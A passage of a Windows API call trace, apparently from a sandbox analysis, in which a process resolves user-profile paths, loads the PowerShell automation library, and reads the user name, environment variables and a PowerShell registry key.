lpFilePart=0x0) returned 0x8 [0125.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.134] SetErrorMode (uMode=0x1) returned 0x1 [0125.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.134] SetErrorMode (uMode=0x1) returned 0x1 [0125.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.134] SetErrorMode (uMode=0x1) returned 0x1 [0125.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.135] SetErrorMode (uMode=0x1) returned 0x1 [0125.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x10ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0125.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.135] SetErrorMode (uMode=0x1) returned 0x1 [0125.135] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.135] SetErrorMode (uMode=0x1) returned 0x1 [0125.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.136] SetErrorMode (uMode=0x1) returned 0x1 [0125.136] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d130 | out: lpFileInformation=0x10d130*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.136] SetErrorMode (uMode=0x1) returned 0x1 [0125.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x10ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x10d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0125.162] SetErrorMode (uMode=0x1) returned 0x1 [0125.162] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d3f0 | out: lpFileInformation=0x10d3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0125.162] SetErrorMode (uMode=0x1) returned 0x1 [0125.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.222] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0125.222] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d758 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d758) returned 0x1 [0125.223] CoTaskMemFree (pv=0x1b9b0710) [0125.223] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0125.223] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d798 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d798) returned 1 [0125.223] CoTaskMemFree (pv=0x23c0a0) [0125.225] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3056c78*="Available", lpRawData=0x3056a08) returned 1 [0125.226] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.226] CoTaskMemFree (pv=0x2af480) [0125.228] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.228] CoTaskMemFree (pv=0x2af480) [0125.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.255] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.255] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0125.255] CoTaskMemFree (pv=0x2af480) [0125.255] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.255] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0125.255] CoTaskMemFree (pv=0x2af480) [0125.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.273] GetCurrentProcessId () returned 0x860 [0125.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.280] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d778 | out: phkResult=0x10d778*=0x1d4) returned 0x0 [0125.280] RegQueryValueExW (in: hKey=0x1d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d6fc, lpData=0x0, lpcbData=0x10d6f8*=0x0 | out: lpType=0x10d6fc*=0x1, lpData=0x0, lpcbData=0x10d6f8*=0x56) returned 0x0 [0125.281] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a6160 [0125.281] RegQueryValueExW (in: hKey=0x1d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d6cc, lpData=0x1b9a6160, lpcbData=0x10d6c8*=0x56 | out: lpType=0x10d6cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d6c8*=0x56) returned 0x0 [0125.281] CoTaskMemFree (pv=0x1b9a6160) [0125.281] RegCloseKey (hKey=0x1d4) returned 0x0 [0125.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.296] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0125.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0125.296] CoTaskMemFree (pv=0x2af480) [0125.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0125.301] GetFullPathNameW (in: 